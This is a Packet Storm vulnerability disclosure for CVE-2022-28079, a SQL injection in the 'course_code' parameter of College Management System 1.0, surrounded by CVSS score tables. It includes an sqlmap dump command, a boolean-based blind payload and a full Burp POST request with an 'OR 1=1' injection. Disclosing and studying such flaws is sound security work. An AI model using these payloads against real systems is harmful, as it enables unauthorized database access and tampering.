Eren GozaydinPACKETSTORM:167131College Management System 1.0 SQL Injection
8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
6.5 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:S/C:P/I:P/A:P
`# Exploit Title: College Management System - 'course_code' SQL Injection (Authenticated)
# Date: 2022-24-03
# Exploit Author: Eren Gozaydin
# Vendor Homepage: https://code-projects.org/college-management-system-in-php-with-source-code/
# Software Link: https://download.code-projects.org/details/1c3b87e5-f6a6-46dd-9b5f-19c39667866f
# Version: 1.0
# Tested on: Windows 10 Pro + PHP 8.0.11, Apache 2.4.51
# CVE: CVE-2022-28079
# References: https://nvd.nist.gov/vuln/detail/CVE-2022-28079
------------------------------------------------------------------------------------
1. Description:
----------------------
College Management System 1.0 allows SQL Injection via parameter 'course_code' in
/College-Management-System/admin/asign-single-student-subjects.php. Exploiting this issue could allow an attacker to compromise
the application, access or modify data, or exploit latent vulnerabilities
in the underlying database.
2. Proof of Concept:
----------------------
In Burpsuite intercept the request from the affected page with
'course_code' parameter and save it like poc.txt Then run SQLmap to extract the
data from the database:
sqlmap -r poc.txt --dbms=mysql
3. Example payload:
----------------------
boolean-based blind
Payload: submit=Press&roll_no=3&course_code=-6093' OR 2121=2121 AND 'ddQQ'='ddQQ
4. Burpsuite request:
----------------------
POST /College-Management-System/admin/asign-single-student-subjects.php HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 80
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=jhnlvntmv8q4gtgsof9l1f1hhe
Referer: http://localhost/College-Management-System/admin/asign-single-student-subjects.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
submit=Press&roll_no=3&course_code=Select+Course%27+OR+1%3d1+OR+%27ns%27%3d%27ns
`
Related
8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
6.5 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:S/C:P/I:P/A:P